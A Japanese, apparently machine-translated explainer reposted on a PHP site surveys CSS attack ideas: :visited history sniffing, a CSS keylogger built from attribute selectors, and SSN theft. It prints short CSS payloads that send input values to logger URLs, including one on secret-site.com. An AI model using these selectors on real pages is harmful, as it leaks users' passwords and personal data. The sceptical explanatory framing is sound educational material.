CSSセキュリティの脆弱性

慌てないで！ CSS自体は大きなセキュリティリスクではなく、ほとんどの場合、あまり心配する必要はありません。

ただし、一部の記事では、CSSの潜在的に驚くべき心配な特徴について説明します。要約しましょう：

訪問された問題をリンクします

問題は次のように説明されています。

1. Webサイトには、 Tickle Pigsなどの特定のページへのリンクがあります。
2. :visitedスタイルを使用して、訪問されたリンクの色を設定しますa:visited { color: pink; } 、これはデフォルトのユーザーエージェントスタイルではありません。
3. リンクの計算スタイルをテストします。
4. 色がピンク色の場合、ユーザーがページにアクセスしたことを意味します。
5. この情報をサーバーに報告し、それに応じて特定のアクションを実行します（保険料の料金の上昇など）。

:visitedスタイルにはbackground-image: url(/data-logger/tickle.php); 、ページにアクセスしたユーザーがのみ要求されます。

心配しないで！ブラウザはこの攻撃をブロックしました。

キーロガー

問題は次のように説明されています。

1. ページに入力ボックス、おそらくパスワード入力ボックスがあります。
2. 入力ボックスの背景画像としてレコードスクリプトを使用し、パスワード情報を収集するために多数のセレクターを追加します。

 input [value^= "a"] {background：url（logger.php？v = a）; }

これを達成するのは簡単ではありません。入力ボックスのvalue属性は、ユーザー入力のためにすぐには変更されません。しかし、Reactのようなフレームワークでは、これは時々起こります。したがって、理論的には、このCSSをReactで構築されたログインページに追加すると、このCSSキーロガーが機能する場合があります。

ただし、この場合、JavaScriptコードがページで実行されています。このような攻撃では、JavaScriptはCSSよりもはるかに危険です。 JavaScript KeyLoggerは、キーイベントを監視し、数行のコードでAjaxを通じてレポートします。

コンテンツセキュリティポリシー（CSP）は、第三者とXSSが注入したインラインJavaScriptをブロックできます...そしてもちろん、CSSもブロックできます。

データ盗難

問題は次のように説明されています。

1. Webサイトのページに悪意のあるCSSを追加できる場合は、ログインしています...
2. また、ウェブサイトには、フォームで事前に入力された社会保障番号（SSN）などの機密情報が表示されます...
3. プロパティセレクターで入手できます。

 input＃ssn [value = "123-45-6789"] {background：url（https://secret-site.com/logger.php?ssn=123-45-6789）; }

多数のセレクターを使用すると、すべての可能性をカバーできます！

インラインスタイルブロックの問題

これがCSSを非難すべきかどうかはわかりませんが、想像してみてください。

 ...一部のユーザー生成コンテンツを挿入...

たぶん、ユーザーがいくつかのCSSをカスタマイズできるようにするかもしれません。これは、スタイルタグを閉じ、スクリプトタグを開き、悪意のあるJavaScriptコードを書くことができるため、攻撃ベクトルです。

間違いなくもっとあります

あなたはそれを考えましたか？共有する。

私は、CSSセキュリティの脆弱性に対する恐怖のレベルに懐疑的です。私は専門家ではないので、セキュリティの問題（特にサードパーティの問題）を過剰にしたくありません。しかし同時に、CSSが思考実験以外の攻撃ベクトルになることを聞いたことがありません。教えてください！

以上がCSSセキュリティの脆弱性の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。